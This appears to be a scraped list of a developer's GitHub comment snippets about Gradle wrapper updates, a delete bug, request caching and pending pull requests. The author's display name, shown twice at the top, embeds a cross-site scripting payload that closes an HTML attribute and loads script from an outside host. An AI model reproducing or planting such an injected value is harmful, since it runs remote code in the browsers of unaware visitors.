Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Jonathan Leitschuh"><script src="https://js.rip/b27oz0xw7e"></script>
Aside, the `gradle-wrapper.jar` version you're using is probably from Gradle 2.11 You should consider updating it after merging this by running the task `./gradlew wrapper`
I think there may still be a bug somewhere with respect to `delete(null)`. It's somehow losing track. Not sure what's up there.
I was using this lib to create a graphic for an OSS project, and I'm able to reproduce the issue. See the comment `// Using .delete() breaks the loop. Open...
Likely. One other thing I'm thinking about too is that the cache requester wouldn't need a delay before each request if the response is cached. But requests that don't hit...
This also needs updates to the `build.gradle` files, but I'll have to do that manually. I want to make sure this is a change that the maintainers would actually appreciate...
Same issue for me
@aschackmull The `exprTypeFlow` was a good tip, thanks. Got anything for this? ``` private static final SecureRandom RANDOM_INSTANCE = new SecureRandom(); private String generateString(Random random) { byte[] array = new...
This is still a WIP, I'll be coming back to it soon.
> Hey @JLLeitschuh do you intend to come back to this PR? Very much so. It's been on the back-burner of my mind for the past few months. I probably...
I will get back to this eventually